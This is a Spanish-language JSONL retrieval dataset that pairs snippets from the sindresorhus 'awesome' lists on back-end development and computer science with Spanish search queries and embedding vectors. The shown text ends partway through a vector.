+{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Fiber β€” Web framework built on top of Fasthttp, the fastest HTTP engine for Go. Kustomize β€” Kubernetes native declarative configuration management tool. OpenTofu β€” Open-source infrastructure as code tool. Reflex β€” Python web framework for building both your frontend and backend with no JavaScript.", "indexar": "ΒΏdΓ³nde encuentro herramientas para la gestiΓ³n de infraestructura como cΓ³digo alternativas a Terraform?", "v": [-0.13229, -0.06237, -0.07871, -0.23389, 0.01243, -0.04195, 0.05178, 0.07114, -0.0918, -0.01423, -0.11502, -0.06494, 0.00648, -0.08957, 0.16601, 0.04284, 0.15724, -0.09221, 0.01594, -0.09419, -0.08811, 0.00722, -0.05671, 0.03261, -0.03868, -0.19676, -0.04315, -0.02554, -0.07747, -0.11, 0.1002, -0.00639, 0.09242, 0.05365, -0.10104, -0.09346, -0.01351, 0.13932, -0.07047, -0.07488, -0.0912, -0.00498, 0.04178, -0.00976, 0.08499, -0.09901, -0.01431, 0.06597, -0.01938, -0.02635, -0.20683, -0.00584, -0.02999, -0.06791, 0.09872, -0.08193, 0.16458, -0.08939, -0.03552, 0.06569, -0.07257, -0.06478, 0.07874, -0.07349, 0.02806, 0.06456, -0.05733, 0.02471, -0.0957, 0.06073, 0.04578, 0.03171, -0.07982, -0.03238, 0.05147, 0.05088, 0.1166, 0.06459, -0.03423, 0.13014, 0.11203, 0.10886, -0.08673, 0.05285, -0.07114, -0.03553, 0.0023, -0.10717, -0.02207, -0.06429, -0.01507, 0.0104, 0.03275, 0.00247, -0.02495, -0.0691, 0.01642, 0.07116, -0.05773, 0.07535, 0.00421, 0.04557, -0.03471, -0.01949, 0.04039, 0.05147, 0.02782, -0.05797, -0.05809, 0.02182, -0.03175, 0.05741, -0.02036, -0.09155, -0.07385, -0.04859, 0.02229, -0.09733, -0.04027, -0.10735, 0.00138, 0.08317, -0.06433, -0.04071, 0.04613, 0.06624, 0.00804, 0.04931, 0.10001, -0.01904, -0.01693, -0.02968, -0.00582, -0.04109, 0.00708, 0.02265, 0.09351, -0.07729, -0.0329, 0.01001, -0.03598, 0.04796, 0.00493, 0.01243, 0.00263, 0.06255, 0.02838, -0.1033, -0.07733, -0.05168, 0.01085, 0.00353, -0.04365, 0.04998, -0.02897, 0.0297, 0.02398, 0.06914, -0.18359, 0.0656, -0.14956, -0.04569, -0.03413, 0.01683, 0.00248, 0.01381, 0.02066, 0.05439, -0.021, 0.01534, 0.07474, 0.04852, 0.06154, -0.03995, -0.03649, -0.0439, -0.03577, -0.05079, -0.01867, -0.03861, -0.01042, 0.01734, -0.04695, 0.04293, -0.00925, -0.044, -0.03433, -0.03009, 0.02115, -0.0213, 0.09004, 0.02262, 0.05614, -0.00356, -0.04034, -0.00358, 0.02791, -0.00824, -0.01468, -0.01021, -0.04952, 0.02633, -0.00069, -0.09992, 0.02609, 0.02414, -0.0694, -0.0522, -0.02684, 0.02674, 0.00613, -0.06625, 0.11319, -0.06321, 0.0198, -0.07009, -0.03399, -0.00394, 0.02045, 0.02158, -0.01581, -0.02627, -0.02252, 0.00992, 0.02364, 0.0039, 0.01332, 0.0105, -0.00607, -0.00679, -0.00464, -0.01753, 0.02428, 0.02201, 0.01046, -0.0115, 0.04822, -0.0177, -0.06283, -0.00511, 0.07105, 0.03987, -0.04239, -0.02845, -0.04217, 0.02535, -0.03426, -0.06261, -0.01791, -0.01506, 0.01077, -0.01574, 0.01426, -0.01128, -0.01721, -0.03587]} +{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: University Courses. Data Science. Tutorials. Machine Learning. Tutorials. ML with Ruby β€” Learning, implementing, and applying Machine Learning using Ruby. Core ML Models β€” Models for Apple's machine learning framework. H2O β€” Open source distributed machine learning platform written in Java with APIs in R, Python, and Scala. Software Engineering for Machine Learning β€” From experiment to production-level machine learning. AI in Finance β€” Solving problems in finance with machine learning. JAX β€” Automatic differentiation and XLA compilation brought together for high-performance machine learning research. XAI β€” Providing insight, explanations, and interpretability to machine learning methods. Speech and Natural Language Processing. Spanish. NLP with Ruby. Question Answering β€” The science of asking and answering in natural language with a machine. Natural Language Generation β€” Generation of text used in data-to-text, conversational agents, and narrative generation applications. Linguistics. Cryptography.", "indexar": "que programas puedo usar para aprender ciencia de datos", "v": [-0.07227, 0.03785, -0.06978, -0.26162, 0.00717, -0.10363, -0.09727, -0.07888, -0.08205, -0.09063, -0.09435, -0.13008, -0.11622, -0.007, -0.04563, -0.01333, 0.15833, -0.03955, -0.00627, -0.07894, -0.01125, -0.13303, -0.10261, -0.04672, -0.0485, 0.04082, -0.00537, -0.04266, -0.03098, 0.12829, -0.04833, 0.10968, 0.01586, -0.07449, -0.19572, 0.10824, -0.00817, -0.00126, 0.0268, 0.00496, -0.1092, 0.03984, 0.00162, 0.05435, 0.05321, 0.11331, -0.04102, -0.00685, -0.01613, -0.07915, -0.07717, 0.0626, -0.00742, -0.08506, 0.0, -0.02934, 0.03024, -0.06614, -0.03374, -0.00738, -0.06668, 0.06773, -0.02829, 0.03632, 0.04251, -0.07101, 0.09038, 0.05847, -0.16653, 0.09979, 0.00739, 0.01041, 0.0355, -0.07287, -0.02388, 0.00398, 0.02943, 0.0062, 0.08067, -0.07169, -0.21583, 0.02986, -0.04602, -0.02979, 0.01285, 0.01992, 0.09326, -0.0003, -0.00256, -0.08547, -0.07667, 0.20287, -0.04777, 0.04838, 0.15087, 0.04137, -0.02523, -0.0531, -0.03236, 0.11055, 0.01524, 0.01955, -0.00539, 0.11356, -0.0436, 0.09532, 0.05781, -0.04421, -0.08871, 0.02327, -0.06458, -0.00404, -0.11006, -0.05703, -0.03412, 0.01249, 0.0316, 0.01453, -0.07222, -0.03368, -0.03203, 0.01523, 0.00778, 0.00831, 0.08313, -0.01619, 0.06297, 0.08416, -0.02039, 0.0331, -0.00811, -0.04205, -0.032, -0.02874, 0.06789, 0.02455, 0.00997, -0.06459, -0.01839, -0.01807, 0.03948, 0.0784, -0.12747, 0.02928, -0.02892, -0.0218, 0.01573, 0.04885, -0.00658, -0.05081, 0.01298, -0.01726, 0.05149, 0.07732, -0.07514, -0.01683, 0.06664, -0.07621, 0.00238, -0.03211, -0.08671, 0.10198, 0.00401, -0.04994, 0.03361, -0.03902, 0.02677, 0.00935, 0.0079, 0.09891, -0.03416, 0.1057, 0.00414, -0.09803, 0.08606, -0.029, -0.02105, -0.05656, -0.06936, -0.0836, -0.01444, -0.02043, -0.03747, -0.04972, 0.05444, 0.02967, 0.03082, -0.01883, 0.0082, -0.00245, -0.04218, 0.08986, 0.07354, -0.03832, 0.02489, -0.05418, 0.01946, 0.0339, 0.05671, -0.00162, -0.00237, 0.08755, -0.01758, 0.01657, 0.00996, 0.03099, 0.0196, -0.02115, 0.002, -0.03749, 0.04028, -0.0528, 0.03596, -0.02674, -0.06315, -0.07617, 0.01749, 0.08847, -0.00989, 0.0488, -0.01429, 0.02836, 0.01748, 0.02168, -0.03857, -0.04246, 0.03202, 0.02464, 0.01264, -0.0, 0.01831, 0.00224, 0.07438, -0.00956, 0.0448, 0.0399, -0.039, 0.01493, -0.03502, -0.02207, -0.04141, 0.09967, -0.01352, -0.05527, -0.02054, -0.00215, -0.08301, 0.04691, 0.00709, -0.05523, -0.0304, -0.02535, 0.043, -0.01282, -0.00086, 0.06696]} +{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: University Courses. Data Science. Tutorials. Machine Learning. Tutorials. ML with Ruby β€” Learning, implementing, and applying Machine Learning using Ruby. Core ML Models β€” Models for Apple's machine learning framework. H2O β€” Open source distributed machine learning platform written in Java with APIs in R, Python, and Scala. Software Engineering for Machine Learning β€” From experiment to production-level machine learning. AI in Finance β€” Solving problems in finance with machine learning. JAX β€” Automatic differentiation and XLA compilation brought together for high-performance machine learning research. XAI β€” Providing insight, explanations, and interpretability to machine learning methods. Speech and Natural Language Processing. Spanish. NLP with Ruby. Question Answering β€” The science of asking and answering in natural language with a machine. Natural Language Generation β€” Generation of text used in data-to-text, conversational agents, and narrative generation applications. Linguistics. Cryptography.", "indexar": "con que puedo implementar aprendizaje automΓ‘tico en ruby", "v": [0.06221, 0.07361, -0.22085, -0.16963, 0.03343, 0.01619, -0.08362, 0.01064, -0.14486, -0.06792, -0.02181, -0.23672, 0.11084, 0.02449, 0.03245, 0.06621, -0.11558, 0.05235, -0.09312, 0.01031, 0.11787, -0.09804, -0.10568, 0.04562, 0.15747, 0.05821, 0.07156, 0.05368, 0.05673, -0.04012, 0.06256, 0.16473, 0.0342, -0.11673, -0.19169, 0.01398, -0.04283, 0.02253, -0.09427, -0.05491, 0.10487, -0.03053, -0.1766, 0.06691, 0.10477, 0.07161, 0.09645, -0.02224, -0.10014, 0.00147, 0.01908, 0.01105, -0.03299, -0.18489, -0.10133, -0.02363, 0.01714, -0.04326, 0.07969, -0.06952, -0.05414, -0.00825, -0.12276, 0.02418, 0.03956, -0.01594, 0.00286, 0.11832, -0.04603, 0.19416, 0.0436, -0.075, -0.07201, -0.09508, 0.06344, 0.10413, -0.08797, -0.00417, 0.02377, 0.00368, -0.04918, -0.04523, -0.09152, 0.06151, 0.14643, 0.01826, -0.04616, -0.0626, 0.13236, 0.00402, -0.07566, 0.07155, -0.0253, -0.03813, 0.00037, 0.06231, 0.03499, -0.07301, 0.01721, -0.02958, -0.01989, -0.09712, 0.03535, 0.10481, -0.01088, 0.0644, -0.01292, 0.0118, -0.00589, 0.0214, 0.01913, 0.03637, -0.05712, -0.08749, 0.0533, 0.06003, 0.03521, 0.03763, -0.01426, -0.00529, -0.11457, 0.03029, -0.01738, -0.05751, 0.0166, 0.03904, -0.02294, 0.05164, 0.03729, 0.01804, 0.00059, -0.00319, 0.05413, -0.02292, 0.03004, 0.08765, -0.06464, 0.00241, -0.06001, -0.03012, -0.06152, 0.04043, -0.00757, -0.04591, 0.00016, 0.00956, 0.08998, -0.04941, 0.03293, -0.02658, -0.07058, -0.03742, 0.0337, 0.03482, -0.006, -0.04567, 0.03117, -0.05985, 0.03945, -0.02159, 0.00342, 0.06151, -0.00338, 0.02645, 0.05069, 0.01531, -0.0434, 0.01528, 0.02392, 0.03443, -0.0491, 0.03849, -0.02032, -0.03618, -0.0327, -0.01051, -0.03663, -0.02657, 0.01667, -0.01435, 0.00929, 0.00966, -0.08482, -0.01416, 0.04921, -0.04962, -0.01204, 0.069, 0.02034, 0.02719, -0.03721, 0.02463, -0.04195, -0.06808, 0.0519, -0.00963, -0.03456, 0.08169, -0.04471, -0.08384, -0.02018, 0.09299, -0.00897, -0.02596, -0.01468, 0.00763, 0.04528, 0.07251, -0.0068, 0.01164, 0.01334, 0.00687, 0.05713, -0.00395, 0.02356, -0.00778, -0.03118, -0.0273, -0.00835, -0.02222, -0.00754, 0.00745, 0.03553, -0.01473, -0.01181, 0.00314, -0.0223, 0.045, -0.00529, 0.00646, -0.00017, 0.0104, -0.06367, 0.0034, 0.05083, 0.00263, -0.00344, 0.01246, -0.07534, -0.03954, 0.0168, 0.03479, 0.01068, -0.03126, 0.01007, -0.06379, 0.0054, 0.01913, 0.01435, -0.0506, -0.00575, 0.03601, 0.00946, -0.00779, -0.03852, 0.03581]} +{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: University Courses. Data Science. Tutorials. Machine Learning. Tutorials. ML with Ruby β€” Learning, implementing, and applying Machine Learning using Ruby. Core ML Models β€” Models for Apple's machine learning framework. H2O β€” Open source distributed machine learning platform written in Java with APIs in R, Python, and Scala. Software Engineering for Machine Learning β€” From experiment to production-level machine learning. AI in Finance β€” Solving problems in finance with machine learning. JAX β€” Automatic differentiation and XLA compilation brought together for high-performance machine learning research. XAI β€” Providing insight, explanations, and interpretability to machine learning methods. Speech and Natural Language Processing. Spanish. NLP with Ruby. Question Answering β€” The science of asking and answering in natural language with a machine. Natural Language Generation β€” Generation of text used in data-to-text, conversational agents, and narrative generation applications. Linguistics. Cryptography.", "indexar": "cual es una plataforma libre para distribuir el aprendizaje automΓ‘tico", "v": [-0.00043, 0.12134, -0.16442, -0.17618, -0.06752, -0.04179, -0.00198, -0.0893, -0.23362, -0.08351, -0.10242, -0.17386, -0.0499, -0.05772, 0.05019, -0.02691, 0.08983, -0.09087, -0.00883, 0.00674, 0.02827, -0.0247, -0.08429, -0.14879, 0.03047, -0.06605, 0.0495, -0.0247, -0.15136, 0.04801, 0.00503, 0.01817, 0.0608, -0.10352, 0.02407, -0.02652, 0.04015, 0.09782, 0.01892, -0.06992, 0.02915, 0.06523, -0.09536, 0.00362, 0.04422, 0.04611, -0.00329, 0.02101, 0.00157, -0.00287, 0.03216, 0.0203, -0.06032, -0.06103, 0.04913, -0.05125, 0.16003, -0.07801, 0.07694, -0.04355, -0.04968, -0.02736, 0.03913, -0.08498, -0.06405, -0.04818, -0.01303, 0.15776, -0.10221, 0.12846, 0.12605, 0.00337, 0.0682, 0.00486, 0.00051, 0.12038, -0.10465, -0.026, 0.0272, -0.03886, 0.08355, -0.05093, -0.03379, 0.00853, 0.09595, -0.03982, 0.03726, -0.13034, 0.05162, -0.01705, -0.01929, 0.02387, -0.04099, 0.03157, 0.04634, -0.11999, 0.05317, -0.05122, -0.03329, 0.0048, -0.02174, -0.05495, -0.08645, 0.01793, -0.06408, 0.05698, -0.01132, -0.07055, -0.05953, -0.03952, 0.10673, 0.00583, -0.00144, -0.00132, -0.02328, 0.05256, -0.02367, 0.08673, 0.07524, 0.05727, 0.01187, 0.02591, -0.01189, -0.07664, 0.1052, 0.01469, -0.0093, 0.11331, -0.00875, 0.03973, 0.05661, -0.07016, -0.03261, -0.01955, -0.00541, -0.00246, 0.01628, 0.0085, -0.09983, -0.05804, 0.02237, 0.05684, 0.00175, -0.10544, 0.07633, -0.02177, 0.09662, -0.10713, 0.00997, -0.00104, -0.14305, 0.02943, 0.01539, -0.01049, -0.00135, -0.07473, 0.00916, -0.06145, -0.0711, 0.05127, 0.06365, 0.06516, 0.04235, 0.02968, 0.01271, 0.00364, -0.04859, 0.02259, 0.02298, 0.00905, -0.00502, 0.09247, 0.05967, -0.08741, 0.01008, -0.06486, -0.07048, -0.02704, 0.01031, 0.00152, -0.05434, -0.0238, -0.0916, -0.0441, -0.03069, -0.03836, -0.00494, -0.01163, 0.02645, 0.07247, -0.00649, 0.01901, -0.07621, -0.08167, 0.07624, -0.01481, -0.05789, 0.01651, 0.03861, -0.05236, -0.099, 0.05473, -0.00354, -0.06243, -0.02471, -0.00834, 0.04489, 0.04381, -0.0187, 0.02768, 0.01123, -0.00899, 0.10919, -0.05933, -0.07425, -0.00858, 0.01229, -0.08975, -0.0055, -0.02683, 0.02033, 0.06207, 0.05573, -0.04711, -0.00561, 0.04495, 0.03817, 0.07983, 0.02581, 0.00156, -0.01641, 0.04676, -0.00899, -0.04355, 0.08308, -0.02667, 0.02516, 0.04082, -0.08255, -0.02935, 0.00141, 0.06505, -0.02305, -0.06162, -0.03168, -0.08802, -0.04635, -0.00236, -0.03502, -0.09788, -0.05354, 0.01329, 0.07049, -0.03185, -0.04564, 0.00487]} +{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: Papers β€” Theory basics for using cryptography by non-cryptographers. Computer Vision. Deep Learning β€” Neural networks. TensorFlow β€” Library for machine intelligence. TensorFlow.js β€” WebGL-accelerated machine learning JavaScript library for training and deploying models. TensorFlow Lite β€” Framework that optimizes TensorFlow models for on-device machine learning. Papers β€” The most cited deep learning papers. Education. Deep Vision. Open Source Society University. Functional Programming. Empirical Software Engineering β€” Evidence-based research on software systems. Static Analysis & Code Quality. Information Retrieval β€” Learn to develop your own search engine. Quantum Computing β€” Computing that utilizes quantum mechanics and qubits on quantum computers. Theoretical Computer Science β€” The interplay of computer science and pure mathematics, distinguished by its emphasis on mathematical rigour and technique. Conversational AI β€” Build awesome chatbots and digital assistants.", "indexar": "que librerΓ­a sirve para entrenar redes neuronales en el navegador?", "v": [0.20842, -0.08219, -0.04385, -0.18182, 0.00034, -0.02914, -0.10426, -0.01174, 0.0256, -0.17799, -0.01787, -0.09764, 0.02873, -0.07947, -0.05871, 0.08378, -0.0197, 0.0007, 0.14895, 0.12241, -0.1331, -0.03811, -0.03154, 0.04565, 0.03328, -0.00615, -0.02632, 0.09218, -0.07115, 0.07358, -0.18097, -0.01474, 0.14524, -0.10265, 0.02455, 0.08592, -0.00898, 0.06411, -0.04372, -0.0353, -0.06075, 0.10911, -0.11622, 0.01396, 0.02365, 0.1082, -0.03287, -0.15584, -0.00183, -0.02803, 0.0839, 0.08441, 0.02694, -0.0926, -0.06695, -0.02989, 0.13325, -0.08314, -0.03607, -0.10581, 0.04862, -0.12287, 0.04236, -0.03752, 0.0036, -0.04889, 0.03443, 0.02463, -0.14215, 0.01336, -0.02761, 0.07579, -0.05709, 0.0195, -0.10748, 0.12591, -0.03604, 0.04574, 0.16042, -0.00474, 0.04357, -0.06203, -0.05713, 0.00418, -0.0511, 0.02317, 0.02768, -0.05393, 0.00363, -0.06971, -0.0125, 0.07649, -0.11944, -0.07714, 0.01394, -0.01579, -0.00171, 0.02695, 0.0496, 0.0154, -0.03863, 0.01992, -0.05451, 0.0829, -0.08462, -0.03113, 0.03492, -0.02721, -0.00425, -0.07635, 0.08026, -0.02564, -0.08889, -0.00535, -0.04212, 0.02555, 0.0335, 0.02711, 0.08331, -0.01597, -0.06138, -0.01264, -0.06193, 0.01243, -0.08275, 0.07866, -0.01275, 0.09702, 0.11176, -0.00761, 0.04564, -0.04373, -0.06099, 0.00526, -0.1096, 0.01543, -0.07974, -0.04276, -0.09995, -0.05125, 0.01341, -0.0582, -0.01853, -0.04016, -0.05759, 0.03069, 0.04173, -0.09342, -0.08375, -0.05664, 0.01841, -0.03496, 0.05566, -0.03504, -0.03945, 0.04737, -0.01451, -0.06577, -0.00297, 0.07476, -0.02951, 0.0772, 0.05044, 0.01455, -0.03452, -0.01251, -0.06857, 0.03839, 0.06726, 0.1366, -0.08068, 0.0013, -0.02097, -0.04057, -0.0089, 0.03196, -0.01604, 0.05342, 0.03319, 0.02821, 0.00252, -0.00743, 0.01666, -0.02826, -0.08532, -0.0283, -0.00607, 0.0165, -0.09101, 0.0062, -0.10183, -0.01576, -0.02316, -0.02329, 0.15708, -0.07268, -0.07963, 0.04122, 0.0447, -0.01722, -0.01496, 0.02626, -0.03569, 0.06002, 0.00085, 0.00348, 0.01188, -0.02018, -0.02445, 0.07514, -0.03129, -0.0403, 0.02204, -0.02814, -0.03539, -0.00064, 0.02547, 0.04212, 0.005, -0.01688, 0.03535, 0.02302, 0.03324, 0.05147, -0.02249, 0.02334, 0.00628, 0.01794, 0.00064, 0.00712, 0.02786, -0.06724, -0.04667, -0.04293, -0.01165, 0.00227, 0.04249, -0.01692, 0.01993, -0.03001, -0.01778, -0.00838, -0.05257, 0.0175, 0.01941, -0.07342, -0.06907, -0.0188, 0.02901, -0.06034, -0.06717, -0.02489, 0.08119, -0.03438, 0.01974, -0.02313]} +{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: Papers β€” Theory basics for using cryptography by non-cryptographers. Computer Vision. Deep Learning β€” Neural networks. TensorFlow β€” Library for machine intelligence. TensorFlow.js β€” WebGL-accelerated machine learning JavaScript library for training and deploying models. TensorFlow Lite β€” Framework that optimizes TensorFlow models for on-device machine learning. Papers β€” The most cited deep learning papers. Education. Deep Vision. Open Source Society University. Functional Programming. Empirical Software Engineering β€” Evidence-based research on software systems. Static Analysis & Code Quality. Information Retrieval β€” Learn to develop your own search engine. Quantum Computing β€” Computing that utilizes quantum mechanics and qubits on quantum computers. Theoretical Computer Science β€” The interplay of computer science and pure mathematics, distinguished by its emphasis on mathematical rigour and technique. Conversational AI β€” Build awesome chatbots and digital assistants.", "indexar": "cual es una alternativa libre a TensorFlow para aprender visiΓ³n artificial?", "v": [-0.09057, 0.05482, -0.18503, -0.09601, -0.07438, -0.00912, -0.09883, -0.01254, -0.11896, 0.0147, -0.00413, -0.20561, -0.08198, 0.13172, 0.19057, 0.02929, 0.09457, -0.17028, 0.08125, 0.09234, 0.00208, 0.01201, -0.07932, -0.08439, 0.08228, -0.06041, -0.06225, -0.04418, 0.01235, 0.02253, -0.04751, 0.01505, 0.08531, 0.05, -0.02247, -0.06755, 0.04876, 0.14063, 0.03204, 0.00514, -0.00724, 0.06524, -0.00299, 0.1573, 0.02832, -0.04535, -0.04153, 0.04473, -0.0576, 0.11319, -0.06029, 0.11704, 0.06203, -0.00871, 0.11196, -0.07666, 0.11358, -0.04819, -0.0261, -0.13838, -0.07437, 0.03665, -0.05407, -0.09864, -0.00034, 0.08866, 0.01411, 0.05236, -0.04337, 0.04786, 0.0338, -0.1742, -0.03021, -0.00993, -0.08769, 0.08864, 0.00579, -0.05989, 0.12825, -0.07655, -0.02263, -0.0398, -0.05478, -0.077, 0.01509, -0.08955, 0.03821, -0.01299, 0.06637, -0.08273, -0.07329, 0.12954, -0.015, 0.05984, 0.05667, 0.03035, -0.01531, 0.00964, -0.13201, 0.10408, 0.05546, -0.05734, -0.06678, -0.01385, -0.0001, 0.02522, -0.03882, 0.01427, -0.16326, 0.01061, -0.03806, 0.05604, -0.03323, 0.00377, 0.0179, -0.02566, -0.05448, 0.07452, 0.00359, 0.03023, 0.0202, 0.00544, -0.05805, -0.09441, 0.03738, 0.01362, -0.00159, 0.08247, -0.08205, 0.05774, 0.01861, 0.00071, -0.04232, -0.11064, 0.01282, -0.01504, 0.08496, -0.01898, -0.01935, -0.01399, -0.03016, -0.01226, -0.02671, -0.0574, -0.03455, -0.04878, 0.03919, -0.06598, 0.03484, -0.01782, -0.11671, -0.02461, 0.0587, 0.05482, 0.03308, -0.02346, -0.0667, -0.04774, -0.05288, 0.08531, 0.00495, -0.01302, 0.05672, -0.00202, -0.01604, -0.06383, -0.01867, 0.01238, -0.06062, 0.06635, -0.05999, 0.03794, 0.00578, 0.00891, 0.0161, -0.00119, -0.03615, -0.13103, -0.04864, -0.04471, 0.00485, -0.02257, -0.09254, -0.03493, 0.03596, -0.04404, -0.01227, -0.01029, 0.01264, 0.00313, -0.00223, -0.04561, -0.07053, -0.11843, 0.07182, 0.00531, -0.03528, -0.08962, -0.03057, -0.00372, -0.00767, 0.01301, 0.01362, -0.04746, -0.03123, 0.01022, 0.0254, 0.05741, -0.04053, 0.0429, 0.08013, -0.00394, 0.04493, -0.02326, 0.00502, -0.04097, 0.00865, -0.04265, -0.03943, -0.00132, 0.07918, -0.0212, -0.00557, 0.01656, -0.07384, -0.03415, 0.04195, 0.09677, -0.05037, -0.01913, -0.0211, 0.01436, -0.01752, -0.00832, -0.00792, 0.01971, -0.03422, 0.09263, -0.0264, -0.02718, 0.05485, 0.09843, -0.02365, -0.05666, -0.00998, -0.02987, -0.04632, 0.01173, -0.02031, -0.08423, -0.06401, 0.01995, 0.05052, 0.01019, 0.00058, 0.03709]} +{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: Papers β€” Theory basics for using cryptography by non-cryptographers. Computer Vision. Deep Learning β€” Neural networks. TensorFlow β€” Library for machine intelligence. TensorFlow.js β€” WebGL-accelerated machine learning JavaScript library for training and deploying models. TensorFlow Lite β€” Framework that optimizes TensorFlow models for on-device machine learning. Papers β€” The most cited deep learning papers. Education. Deep Vision. Open Source Society University. Functional Programming. Empirical Software Engineering β€” Evidence-based research on software systems. Static Analysis & Code Quality. Information Retrieval β€” Learn to develop your own search engine. Quantum Computing β€” Computing that utilizes quantum mechanics and qubits on quantum computers. Theoretical Computer Science β€” The interplay of computer science and pure mathematics, distinguished by its emphasis on mathematical rigour and technique. Conversational AI β€” Build awesome chatbots and digital assistants.", "indexar": "hay alguna herramienta que me ayude a crear un asistente virtual por voz?", "v": [0.10045, 0.14303, -0.22969, -0.0474, 0.01397, -0.02151, -0.09026, -0.09178, 0.01735, -0.13589, -0.0597, -0.1916, -0.02355, 0.08718, 0.0759, 0.03848, 0.1553, -0.06615, -0.00446, 0.15576, 0.12143, 0.02352, -0.11228, 0.02457, -0.06791, 0.02428, 0.07272, -0.0737, -0.06487, 0.02281, -0.00423, 0.05679, -0.00617, -0.01201, 0.00246, -0.16032, -0.0215, 0.0183, -0.00774, 0.06688, -0.01409, 0.04609, -0.01072, 0.05938, 0.03596, 0.06234, -0.01364, 0.03569, 0.02273, 0.08323, -0.08407, -0.21173, -0.13633, -0.04945, 0.05296, -0.0696, 0.19424, -0.16307, -0.02943, -0.11044, -0.12191, -0.06793, -0.04166, -0.03331, 0.05668, 0.04713, 0.08637, -0.13978, -0.11654, 0.04647, -0.09113, 0.01031, 0.01675, -0.01675, 0.04263, -0.04187, -0.08325, 0.00561, 0.04136, -0.01244, 0.06951, 0.00913, 0.00077, 0.03038, -0.00678, -0.09527, 0.09465, 0.03158, 0.07889, -0.07599, -0.00958, 0.04589, -0.04365, -0.04091, 0.00908, 0.06431, 0.11961, -0.03706, -0.02522, -0.04785, 0.10439, -0.05271, 0.02518, 0.05349, -0.00497, 0.03435, 0.01384, -0.05715, 0.00352, -0.0546, 0.09183, 0.02858, -0.00963, -0.00322, 0.05655, 0.02095, 0.04864, -0.00552, 0.08067, -0.05654, 0.10577, 0.11714, -0.05114, -0.03288, -0.04724, 0.00266, -0.03698, 0.03822, 0.00777, -0.02229, -0.06693, -0.08221, -0.00121, -0.13216, 0.04765, 0.06382, 0.0265, -0.05969, -0.0043, -0.07314, -0.02313, 0.03675, 0.00913, -0.1759, 0.03462, -0.01993, 0.01446, -0.0595, -0.04058, 0.01787, 0.0515, 0.00689, 0.03688, 0.05376, -0.06293, 0.06579, -0.01573, 0.02748, -0.08739, 0.01241, 0.02352, -0.00266, -0.02842, -0.05131, -0.0552, -0.08363, -0.00014, 0.03871, 0.04066, 0.07023, -0.03853, -0.00581, 0.06103, 0.00086, -0.02188, 0.02021, -0.02272, -0.00845, 0.03099, -0.04485, -0.02889, 0.0017, -0.038, -0.04141, 0.04682, -0.05134, 0.0077, -0.01471, -0.06189, 0.04047, -0.02543, 0.01286, -0.06578, -0.02792, 0.04611, 0.00678, -0.0279, -0.03098, 0.01823, -0.05734, -0.0493, -0.06001, -0.04793, -0.0635, -0.00271, 0.0429, -0.05003, 0.04034, 0.01597, 0.03458, 0.07181, -0.03869, -0.04922, 0.02161, 0.05743, 0.01533, -0.0067, -0.01039, -0.02074, -0.07989, 0.02167, -0.01791, 0.0433, 0.01915, -0.03486, 0.06718, 0.08441, 0.03151, 0.00086, -0.00255, -0.01079, -0.06267, 0.02669, -0.06257, -0.0283, 0.00214, 0.03306, -0.0051, -0.06999, -0.05425, 0.00839, 0.05958, 0.0104, -0.03587, 0.0124, -0.03598, -0.03724, 0.0492, -0.02929, -0.04398, -0.03304, 0.00866, 0.06943, -0.04879, 0.03622, -0.01361]} +{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: Generative AI β€” Automatically generates a wide range of unique content in text, image, and audio format. Position-Based Quantum Cryptography β€” Theory on quantum cryptography that utilizes special relativistic constraints to achieve quantum-security under certain conditions.", "indexar": "que programa genera texto, imΓ‘genes y audio de forma automΓ‘tica?", "v": [0.04544, 0.12009, -0.02061, -0.20457, 0.01143, -0.05516, -0.07191, -0.06718, -0.07102, -0.05188, -0.07434, -0.12463, -0.04257, -0.01941, 0.07144, -0.0124, 0.12483, -0.1083, 0.03527, 0.05153, 0.03106, -0.04593, -0.07245, -0.07352, -0.01361, -0.03987, 0.02083, -0.03905, -0.07801, 0.07223, 0.08447, 0.0796, 0.12666, -0.14971, -0.14598, -0.0249, 0.02623, 0.06464, -0.03501, 0.12186, -0.01689, 0.06299, -0.05408, 0.01322, -0.00785, -0.02017, 0.05141, 0.04756, -0.02149, -0.0529, 0.07014, 0.07319, 0.0128, 0.02836, -0.06045, -0.15466, 0.17266, -0.10056, -0.05955, -0.06034, 0.11621, 0.15639, -0.06875, -0.01998, -0.04777, 0.16444, 0.14862, -0.03794, -0.01668, 0.02153, 0.02441, -0.01416, 0.06215, -0.00371, 0.08729, 0.04872, -0.17807, -0.08018, -0.04948, -0.02903, -0.0371, -0.06274, -0.01574, 0.04103, -0.06425, -0.02786, 0.00995, 0.02968, -0.00358, -0.0872, -0.00724, 